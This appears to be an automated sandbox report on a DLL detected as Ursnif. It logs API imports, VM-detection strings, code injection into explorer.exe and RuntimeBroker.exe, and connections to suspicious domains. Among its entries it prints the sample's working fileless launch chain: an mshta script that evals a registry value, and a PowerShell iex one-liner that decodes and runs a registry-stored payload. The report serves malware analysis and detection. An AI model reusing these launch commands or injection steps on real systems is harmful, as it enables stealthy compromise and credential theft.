Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B6B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	0_2_00B6B4A5
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B66467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	0_2_00B66467
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B5BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	0_2_00B5BAF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0334BAF2 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	3_2_0334BAF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_03356467 lstrcmp,FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,	3_2_03356467
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0335B4A5 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	3_2_0335B4A5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\loaddll32.exe

0_2_00B52E19

Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.735751989.00000000047D0000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: RuntimeBroker.exe, 00000031.00000000.776047119.000001B91D040000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000027.00000000.726075838.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000027.00000000.705856126.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1A1DE5 LoadLibraryA,GetProcAddress,

0_2_6E1A1DE5

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_00B576B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		0_2_00B576B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_033476B3 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,		3_2_033476B3

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 52.97.178.98 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.29.104.83 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.101.9.178 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.office365.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: www.outlook.com
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 40.97.160.2 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: xereunrtol.website
Source: C:\Windows\SysWOW64\rundll32.exe	Domain query: zereunrtol.website

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe	Section loaded: unknown target: unknown protection: execute and read and write

Writes to foreign memory regions

Show sources

Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6DD8E12E0	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 93C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: AD0000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 940000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: D80000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\explorer.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2A20574000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000
Source: C:\Windows\explorer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580

Changes memory attributes in foreign processes to executable or writable

Show sources

Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute read
Source: C:\Windows\explorer.exe	Memory protected: unknown base: 7FFC8DCB1580 protect: page execute and read and write

Allocates memory in foreign processes

Show sources

Source: C:\Windows\explorer.exe

Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B91F360000 protect: page execute and read and write

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 93C000 value: 00	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: AD0000 value: 80	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 940000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: D80000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: PID: 3352 base: 7FFC8DCB1580 value: 40

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3352
Source: C:\Windows\explorer.exe	Thread register set: target process: 4084
Source: C:\Windows\explorer.exe	Thread register set: target process: 4176
Source: C:\Windows\explorer.exe	Thread register set: target process: 4440

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: C:\Windows\explorer.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 8DCB1580
Source: C:\Windows\explorer.exe	Thread created: unknown EIP: 8DCB1580

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Mcbw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mcbw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Edc0='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Edc0).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>'

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\uT9rwkGATJ.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uio4qdnj.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline'	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E').UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9EC1.tmp' 'c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB12F.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB287.tmp' 'c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESC95B.tmp' 'c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000027.00000000.717923899.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.822246268.0000000001C80000.00000002.00020000.sdmp, explorer.exe, 00000027.00000000.719201700.00000000011E0000.00000002.00020000.sdmp, RuntimeBroker.exe, 00000031.00000000.782765684.000001B91D590000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000027.00000000.719678172.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00B0A82B cpuid

0_2_00B0A82B

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00B53E33 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

0_2_00B53E33

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1A1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6E1A1172

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1A1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6E1A1825

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_00B0A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

0_2_00B0A82B

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678615660.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534139791.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678663993.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.679072196.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678803157.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000000.762429648.00000000102CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534181195.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545843952.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.635415693.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533885657.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678996946.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.620987281.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545818216.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545905967.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.637594207.000000000544C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: 0.2.loaddll32.exe.b00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.4a794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.13494a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.50394a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.3020000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.2f7a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.96a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.69a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.6aa309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.2bd0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.300a309.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000003.475507356.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.821862720.0000000001349000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.488168081.0000000002F70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.750652443.0000000005039000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.524931430.0000000004A79000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.457623668.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.456819132.0000000000690000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.491371934.00000000006A0000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000000.00000003.534061111.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.678884329.0000000004348000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534116872.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.533922988.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.534170711.00000000018D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545735398.0000000005648000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.545790657.0000000005648000.00000004.00000040.sdmp, type: MEMORY
